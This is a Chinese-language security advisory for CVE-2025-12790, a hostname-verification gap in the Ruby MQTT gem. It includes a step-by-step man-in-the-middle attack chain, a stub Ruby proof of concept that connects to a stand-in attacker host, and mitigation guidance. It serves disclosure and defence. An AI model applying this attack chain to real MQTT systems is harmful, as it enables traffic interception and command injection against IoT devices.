CVE-2025-12790: Rubygem MQTT默认未启用主机名验证导致中间人攻击

漏洞信息

漏洞编号

CVE-2025-12790

漏洞类型

中间人攻击（MITM）/ 主机名验证缺失

CVSS评分

7.4 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Rubygem MQTT (ruby-mqtt)

漏洞概述

CVE-2025-12790是Ruby生态中广泛使用的MQTT客户端库Rubygem MQTT的一个高危安全漏洞。该漏洞源于库在默认配置下未对SSL/TLS连接进行主机名（hostname）验证，导致攻击者可以实施中间人（Man-in-the-Middle, MITM）攻击。在MQTT协议广泛应用于物联网（IoT）设备通信、工业控制系统和消息队列场景的背景下，此漏洞可能影响大量使用该库进行安全敏感通信的应用程序。攻击者通过在客户端与服务器之间的网络路径上拦截和篡改流量，可以窃取传输中的敏感数据、冒充合法服务器或修改消息内容，对系统的机密性和完整性造成严重威胁。由于MQTT协议常用于传输设备控制指令、传感器数据和系统状态信息，此类攻击可能导致设备被恶意控制、数据泄露或业务流程被干扰。

技术细节

Rubygem MQTT库在建立SSL/TLS连接时，默认配置下跳过了主机名验证步骤。主机名验证是SSL/TLS证书验证的关键环节，用于确保客户端连接的目标服务器确实是其声称的合法实体，而不是攻击者伪装的恶意服务器。该漏洞存在于MQTT连接的初始化过程中，当使用加密连接（MQTTS）时，库未能正确验证服务器证书中的Common Name (CN)或Subject Alternative Names (SAN)与连接目标主机名是否匹配。攻击者可以部署伪造的MQTT服务器，使用自签名证书或被盗取的合法证书，在客户端发起连接时成功完成SSL握手。由于缺少主机名验证，客户端无法检测到服务器身份的真实性，从而建立了看似安全实则存在风险的加密通道。攻击者随后可以在此通道上窃听通信内容、篡改MQTT消息（PUBLISH包）或注入恶意控制指令。

攻击链分析

STEP 1

步骤1：网络位置部署

攻击者处于客户端与MQTT服务器之间的网络路径上，可通过ARP欺骗、DNS劫持、WiFi热点劫持或路由控制等方式实现

STEP 2

步骤2：部署伪造服务器

攻击者部署恶意MQTT服务器，使用自签名证书或从其他渠道获取的SSL证书，该证书与目标服务器域名不匹配

STEP 3

步骤3：流量重定向

通过DNS欺骗或路由策略将受害者客户端的连接请求重定向到攻击者控制的服务器

STEP 4

步骤4：SSL握手劫持

客户端连接时，攻击者服务器提供伪造证书。由于Rubygem MQTT默认未验证主机名，客户端接受该证书并完成SSL握手

STEP 5

步骤5：流量嗅探与篡改

攻击者在建立的加密通道上明文查看所有MQTT通信内容，可修改PUBLISH消息、订阅主题或注入恶意指令

STEP 6

步骤6：持久化控制

攻击者可以伪装成合法服务器持续与客户端通信，收集敏感数据或下发恶意控制命令

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12790 PoC - MITM Attack on Rubygem MQTT
# This PoC demonstrates the hostname validation bypass vulnerability

require 'mqtt'
require 'openssl'

# Create a fake MQTT server with self-signed certificate
class FakeMQTTServer
  def initialize(cert_path, key_path)
    @cert = OpenSSL::X509::Certificate.new(File.read(cert_path))
    @key = OpenSSL::PKey::RSA.new(File.read(key_path))
  end
  
  def start_fake_server(port = 8883)
    # Simulate malicious server accepting connections
    puts "[*] Fake MQTT server running on port #{port}"
    puts "[*] Waiting for victim connection..."
    # In real attack, this would intercept and manipulate traffic
  end
end

# Vulnerable client connection (without hostname verification)
def vulnerable_mqtt_connect(broker_host)
  # Default behavior - hostname validation is disabled
  MQTT::Client.connect(
    host: broker_host,
    port: 8883,
    ssl: true,
    # Missing: verify_mode: OpenSSL::SSL::VERIFY_PEER
    # Missing: cert_chain_file for proper validation
  )
end

# Example of vulnerable usage
begin
  client = vulnerable_mqtt_connect('attacker-controlled-server.example.com')
  # Connection succeeds even with fake certificate
  puts '[!] Connection established - hostname validation bypassed!'
  puts '[!] All traffic is now visible to MITM attacker'
  
  # Attacker's interception capabilities:
  # 1. Read all published messages
  # 2. Modify message content
  # 3. Inject fake commands
  # 4. Disconnect legitimate clients
rescue => e
  puts "[!] Error: #{e.message}"
end

影响范围

Rubygem MQTT < 0.7.0

防御指南

临时缓解措施

如果无法立即升级到修复版本，可在连接配置中强制启用SSL验证：使用verify_mode: OpenSSL::SSL::VERIFY_PEER启用证书验证，配置ca_file指向可信CA证书，并确保hostname verification被正确执行。同时限制MQTT客户端的网络访问范围，避免通过不可信网络（如公共WiFi）连接MQTT服务器。对于高安全要求的场景，考虑在应用层实现额外的消息签名和加密机制。